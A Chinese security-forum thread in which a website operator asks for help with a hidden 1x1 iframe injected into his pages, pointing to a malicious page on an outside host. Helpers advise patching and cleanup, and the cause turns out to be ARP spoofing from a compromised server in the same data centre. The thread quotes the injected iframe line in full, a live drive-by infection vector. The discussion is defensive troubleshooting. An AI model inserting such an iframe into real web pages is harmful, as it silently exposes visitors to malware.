瑞星卡卡安全论坛

被注入流氓代码如下：
<iframe src=http://www.hukau.cn/kuku008.htm width=1 height=1></iframe> 

118jj.com

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)

看来不是我一个。网上这么多人发贴，昨天中着了

没人回答啊？

什么网站中了啊请LZ说清楚

昨天好多人中了这个木马。瑞星能解决吗。我搜索了一下网上发贴，都是23号中的。

这个不是木马，也不是挂马代码。
不懂你的意思，可以给出哪个网址被挂马吗？

118jj.com
我临时关闭服务器了。

elyjob.com也中了

远程ie打开，被挂马，服务器本地打开正常。很奇怪。网站文件未被修改过。

hxxp://www.hukau.cn/kuku008.htm
这个网址的确是网马。LZ可在网站源代码里找到该网址直接删除，打全系统补丁，flash漏洞补丁，ms06-014微软的系统漏洞补丁。如网站服务器装有realplay软件将其升级到最新版。网站如有数据库请将数据库密码更改。

确实服务器上增加了flash等加载项。补丁都是最新的。应该没问题。服务器上的网站代码没有被修改的文件。realplay没有。可是flash插件删除不掉啊。现在只能选择ie的禁止功能。

查看网站源代码，删除hxxp://www.hukau.cn/kuku008.htm

elyjob.com和118jj.com两个网址全称，全网址是什么？

服务器是增加了flash加载项。flash插件已经删除不掉。现在只能关闭ie加载项，补丁都是最新的，应该没问题。数据库和网站恢复到n天前正常状态，还是有不能解决。
飘泊而立狮，可否加我qq294955933.我给您远程权限，帮我看看服务器。

网站源代码里没有哪个网址吗？用查找工具，查找一下？:default6:

服务器上没有这个代码，可是浏览过这个域名的主机(我自己的电脑)的注册表里发现了。
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs

url10:
<iframe src=http://www.hukau.cn/kuku008.htm width=1 height=1></iframe> 
url19
http://www.hukau.cn/kuku008.htm

看来是新木马。目前所有杀毒软件都查不出来呢。

在你自己电脑的注册表？把这个键值删除了。其它电脑访问你的服务器网站有报病毒吗，瑞星最新版应该可以查杀这个病毒。如其它电脑访问服务器没有问题，那就是你这台电脑有问题了。

将瑞星升级到最新版，可以查杀。Worm.Win32.CnVampire.f

http://www.snsidea.com/
http://cnzz.com/
http://s96.cnzz.com/
。。。。
被加了不少，全删了

其他电脑访问网站的时候，都发现有正在下载的进程提示，很快。刷。刷。刷。两下。就被装载完了。
很多同事都发现这个问题。

这三个网站看了一下，没有可疑网址。

谢谢。问题解决了。

非常感谢瑞星，简单说下最后结果。
机房的55服务器被挂了。我的51服务器的昨天瑞星防火墙arp不停报警。从外部访问时，加入了代码。机房把55关机了，同时开启了瑞星防火墙arp，所有网站都好了。
我自己的电脑杀了一下毒。去掉了注册表注入的代码，也正常了。

感谢狮子